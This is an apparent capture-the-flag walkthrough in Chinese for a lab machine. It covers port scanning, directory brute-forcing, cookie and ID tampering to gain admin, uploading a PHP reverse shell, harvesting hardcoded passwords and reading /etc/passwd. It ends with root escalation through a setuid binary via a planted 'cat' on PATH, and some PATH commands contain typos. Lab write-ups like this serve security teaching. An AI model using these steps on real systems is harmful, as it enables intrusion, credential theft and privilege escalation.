1.端口扫描
nmap -sV -sC -v -T3 {ip}
# -T是时间参数,数字越大扫描越快
开放了80端口和22端口
2.目录爆破
访问80端口
使用gobuster进行爆破
gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirb/common.txt
# 得到如下信息
3.Uploads权限获取
在查看源代码的js文件的时候,看到了如下信息
尝试访问/cdn-cgi/login
发现了一个登录入口
点击Login as Guest
进入了网站后台,发现了Uploads模块,但必须要admin权限才行
这时考虑到网站可能是利用cookie来进行身份认证的
在account界面有我们当前账号的信息
下方的两个cookie值刚好和Access ID以及Name相对应
那么我们想要修改权限role可以改成admin,但还需要Access ID
又观察到url的参数里有id这一参数,尝试将id=2修改为id=1
界面返回了admin的相关信息
修改相关cookie值
成功修改了权限,现在可以进行文件上传了
4.上传Webshell
可以直接利用kali自带的一些Webshell
cat /usr/share/webshells/php/php-reverse-shell.php
# 拷贝内容,对ip和监听的端口进行更改,保存为shell.php
nc -nlvp 4444
# 监听端口
上传shell后,观察到之前爆破出来的路径有/uploads,所以大胆猜测上传的文件就保存在/uploads目录下
成功弹出了shell
5.flag1
python3 -c "import pty; pty.spawn('/bin/bash')"
# 切换一个更方便的pty
whoami
# 是一个www-data用户,该权限太低了,得找找看其他用户是否可以登录
cat /etc/passwd
# 查看用户,结果如下
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
倒数第二排有一个robert用户,有home目录,应该是一个用户
# 经过一番查找
cd /var/www/html/cdn-cgi/login
cat * |grep password
# 查找和密码相关的信息,结果如下
if($_POST[“username”]=”admin” && $_POST[“password”]=”MEGACORP_4dm1n!!”)
但是看内容这个应该是后台登录的账号密码,尝试了下,没法su robert
那只能一个个翻了
cat db.php
# 返回如下
$conn = mysqli_connect(‘localhost’,’robert’,’M3g4C0rpUs3r!’,’garage’);
>?>
su robert
# 用该密码登录成功
cd /home/robert
cat user.txt
# 得到flag{f2c74ee8db7983851ab2a96a44eb7981}
6.提权
id
# 查看当前用户组
# uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker) 属于bugtracker
locate bugtracker
# 查找bugtracker,发现是一个文件
ls -al /usr/bin/bugtracker
# 查看下权限
# -rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
# -s权限指setid权限,由于该文件是root用户的,无论谁执行,都会以root权限进行
bugtracker
# 尝试执行
当提供的ID过大时,会直接调用cat命令
利用cat命令是需要环境变量的
echo PATH
# 查看当前环境变量
# 返回/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr # /games:/usr/local/games
# 意思是调用cat命令时会依次从上述提供的路径下去寻找相关执行文件,要是遍历完还是没找# 到,就会输出command not found
which cat
# 返回cat命令是在/bin/cat目录下
cd /tmp
echo "/bin/sh" >cat
# 在tmp目录下创建同名cat文件
export PATH=/tmp:PATH
# $PATH中加入/tmp
加入成功
这时候执行cat命令时,就会执行/tmp下的同名cat文件,同时由于是setid,将以root权限执行/bin/sh
提权成功
但是要注意,这时候是没法使用cat命令的
可以rm /tmp/cat 然后再使用cat
或者直接使用tac root.txt